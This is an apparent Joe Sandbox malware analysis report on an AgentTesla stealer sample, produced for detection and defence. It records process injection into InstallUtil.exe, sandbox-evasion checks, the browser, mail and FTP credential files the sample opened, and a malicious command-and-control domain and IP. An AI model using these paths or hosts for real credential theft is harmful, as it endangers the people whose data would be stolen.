                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596171Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596061Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595952Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595841Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595734Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595624Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595515Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595406Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595296Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595187Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594968Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                        Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, tTXQS6DONV.exe, 00000001.00000002.2892478097.0000000005070000.00000004.08000000.00040000.00000000.sdmp, tTXQS6DONV.exe, 00000001.00000002.2881532887.0000000002991000.00000004.00000800.00020000.00000000.sdmp, tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                        Source: tTXQS6DONV.exe, 00000001.00000002.2881532887.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q#SOFTWARE\VMware, Inc.\VMware VGAuth
                        Source: InstallUtil.exe, 00000005.00000002.3407260380.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 114D008Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeQueries volume information: C:\Users\user\Desktop\tTXQS6DONV.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3bdf172.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b8bbf2.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b62122.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3c09450.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b8bbf2.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b38642.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b38642.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b62122.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3c09450.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.3406296559.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2888881438.0000000003B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3840, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3840, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3bdf172.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b8bbf2.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b62122.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3c09450.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b8bbf2.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b38642.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b38642.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3b62122.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3c09450.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.3406296559.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2888881438.0000000003B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3840, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Valid Accounts                        		121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Encrypted Channel                        		1
                        Exfiltration Over Alternative Protocol                        		Abuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
                        Valid Accounts                        		1
                        Valid Accounts                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        Credentials in Registry                        		24
                        System Information Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Access Token Manipulation                        		2
                        Obfuscated Files or Information                        		Security Account Manager111
                        Security Software Discovery                        		SMB/Windows Admin Shares1
                        Email Collection                        		1
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
                        Process Injection                        		12
                        Software Packing                        		NTDS1
                        Process Discovery                        		Distributed Component Object ModelInput Capture11
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets141
                        Virtualization/Sandbox Evasion                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Valid Accounts                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Access Token Manipulation                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                        Virtualization/Sandbox Evasion                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                        Process Injection                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                        Hidden Files and Directories                        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        tTXQS6DONV.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                        tTXQS6DONV.exe100%AviraTR/Kryptik.wuqqo
                        tTXQS6DONV.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://ftp.aminhacorretora.com.br100%Avira URL Cloudmalware
                        http://aminhacorretora.com.br100%Avira URL Cloudmalware

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        aminhacorretora.com.br
                        		162.241.203.30
                        		truetrue
                          		unknown
                          ftp.aminhacorretora.com.br
                          		unknown
                          		unknowntrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://aminhacorretora.com.brInstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://ftp.aminhacorretora.com.brInstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              162.241.203.30
                              		aminhacorretora.com.brUnited States
                              		26337OIS1UStrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1569277
                              Start date and time:2024-12-05 17:13:01 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 52s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:tTXQS6DONV.exe
                              renamed because original name is a hash value
                              Original Sample Name:5b79bb5c716c9797e048785965be3c3a54a73a587d23d0027130cb31b618e124.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/4@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 148
                              • Number of non-executed functions: 53
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: tTXQS6DONV.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              11:14:05API Interceptor207x Sleep call for process: tTXQS6DONV.exe modified
                              11:15:14API Interceptor462x Sleep call for process: InstallUtil.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              162.241.203.30S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                              • nossoplayer.me/admin/
                              RjGM2z2Z3gVHbRl.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/eauu/?DZDL=WHu5pNat8uHfzRxaB9vtQ4eIh6FN4j/LlAnIasWF7xCzNp7gljTYY7GdEKRxmLt8YdbcyrQMPNW8Q0wryNhuApS+Kh6rZS0ucw==&XJE=v0GXajs0Cfa
                              PI5102295.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?4hzh=z6Y8Z0&a8GP-0=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL553wQlR/hos/LA==
                              SecuriteInfo.com.Trojan.GenericKD.61688138.7209.1529.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?bH=ZR2t9tZxXpFp&j48x=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL58jtUiF/uIknLA==
                              ZsFMADRfZB.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?2dyL8P=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlO3cbHe0QClKYeKQ==&I6Ah=eFQ8RbYHBTF0_Z
                              SecuriteInfo.com.Trojan.DownLoaderNET.447.13310.17565.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?t0GX=kdo4s&9rW=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw
                              SecuriteInfo.com.Trojan.DownloaderNET.345.11377.31950.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?9ro=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw&q2ML=zTqLQN
                              SKMB610952.jsGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              aminhacorretora.com.brHangarskibenes.exeGet hashmaliciousGuLoaderBrowse
                              • 162.241.203.30

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              OIS1USdY1ZxYJOz7.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              i9QKJCpVZJ.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                              • 192.185.147.100
                              Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 192.185.147.100
                              https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627Get hashmaliciousHTMLPhisherBrowse
                              • 162.241.71.126
                              http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrmGet hashmaliciousUnknownBrowse
                              • 162.241.71.126
                              https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                              • 162.241.71.126
                              Isabella County Emergency Management-protected.pdfGet hashmaliciousHTMLPhisherBrowse
                              • 162.241.71.126
                              Isabella County Emergency Management-protected.pdfGet hashmaliciousUnknownBrowse
                              • 162.241.71.126
                              https://online-e.net/st-manager/click/track?id=795&type=raw&url=https://msc-mu.com/apikey-tyudqnhzdgevhdbasx/secure-redirect%23Darth.Vader%2BDeathStar.com&source_url=https%3A%2F%2Fonline-e.net%2Feven-if-even-though%2F&source_title=Even%20if%E3%81%A8Even%20thoughGet hashmaliciousUnknownBrowse
                              • 162.241.85.172

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tTXQS6DONV.exe.log

                              Download File
                              Process:C:\Users\user\Desktop\tTXQS6DONV.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLV1qE4x84qpE4KlKDE4KhKiKhIE4KnKIE4oKNzKoZAE4Kze0E4j:Mp1qHxv2HKlYHKh3oIHKntHo6hAHKzea
                              MD5:8275047EA04782E18195CE5F2F076225
                              SHA1:86FE553781E50EE2493A6D54A2F329FF94AD0DEE
                              SHA-256:302DE184C80A778557AA7F09DDCAB59FED5712B6BC617FDEAFE1E004021FFDDC
                              SHA-512:4F7B9BE379C98D5E9609D46FC0B473C66A977C3A081C60872CB8FE344C2785A285E9D9019D49515A6DC5D1E6EFF2D8DD5E5BA49086AF24F8A2F50E6B9EBE588B
                              Malicious:true
                              Reputation:moderate, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                              C:\Users\user\AppData\Roaming\zhxzqq0h.p3l\Chrome\Default\Network\Cookies

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
